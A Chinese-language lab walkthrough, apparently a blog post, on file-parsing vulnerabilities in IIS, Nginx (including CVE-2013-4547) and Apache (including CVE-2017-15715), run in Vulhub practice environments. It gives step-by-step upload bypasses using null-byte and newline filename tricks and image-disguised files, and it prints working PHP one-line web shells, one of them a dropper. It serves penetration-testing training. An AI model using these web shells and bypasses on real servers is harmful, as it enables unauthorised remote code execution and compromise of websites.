中间件解析了漏洞【IIS Nginx Apache】

IIS

1.IIS6.X

1.使用Windows2003虚拟机,在其中安装IIS6.X

2.在IIS6.X中,.asp文件夹中的文件都会被当作asp文件去执行

我们在网站根目录创建一个x.asp文件

在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。

在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行

2.IIS7.X

1.php.ini⾥的cgi.fix_pathinfo=1 开启,把前面的分号去掉就算开启了

2.IIS7在Fast-CGI运⾏模式下

3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

4.蚁剑连接

Nginx

1.nginx_parsing

1.在kali中开启vluhub靶场

在vluhub中找到Nginx中的靶场,运行docker-compose文件就是开启靶场

docker-compose up -d

2.运行docker-compose ps -a查看进程

3.访问

4.制作图片马进行上传,并获取木马地址

GIF89a是图片标识,如果不加会导致网站不认可我们的jpg文件

注意:cmd要加上引号

5.访问我们的图片马

访问不到我们的一句话木马,那么我们就要在目录后面加上.php让网站将我们的文件进行php解析

6.蚁剑连接

2.CVE-2013-4547

1.开启环境,同上

2.访问靶机

3.上传文件shell.php,抓包,将php改为jpg并在jpg后面加上两个空格和.php

4.在Hex中将第二个空格改为00

5.放行,上传成功

6.访问这个shell.jpg并进行抓包,将get后面参数加上两个空格,和.php

7.在hex中依旧将第二个空格改为00

Apache

1.apache_parsing

1.开启靶机

2.访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a

<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

3.蚁剑连接

2.CVE-2017-15715

1。开启靶机

2.访问靶机并上传 shell.jpg 文件,文件内容为GIF89a

<?php @eval($_POST['cmd']);?>,filename为1.php

3.抓包,在php后面加上空格,并把hex中的空格改为0a

4.放行访问1.php%0A

5,蚁剑连接

相关推荐
SAP工博科技11 分钟前
SAP 公有云 ERP 多工厂多生产线数据统一管理技术实现解析
大数据·运维·人工智能
YongCheng_Liang14 分钟前
从零开始学虚拟化:桌面虚拟化(VDI)入门指南(架构 + 产品 + 部署)
运维·云计算
杜子不疼.21 分钟前
【Linux】库制作与原理(二):动态库的制作与使用
linux·运维·服务器
消失的旧时光-194329 分钟前
Nginx 是什么?为什么它不写在代码里?——从 0 认识 Nginx
运维·服务器·nginx
BJ_Bonree30 分钟前
4月17日,博睿数据受邀出席GOPS全球运维大会2026 · 深圳站!
大数据·运维·人工智能
RisunJan31 分钟前
Linux命令-lpq(查看打印队列状态)
linux·运维·服务器
山君爱摸鱼32 分钟前
Linux-服务进程
linux·运维·服务器
阿乐艾官33 分钟前
【linux文件系统重要目录及命令解释】
linux·运维·服务器
senijusene39 分钟前
Linux软件编程: Linux 操作系统基础与shell脚本
linux·运维·chrome
乾元1 小时前
身份与访问:行为生物识别(按键习惯、移动轨迹)的 AI 建模
运维·网络·人工智能·深度学习·安全·自动化·安全架构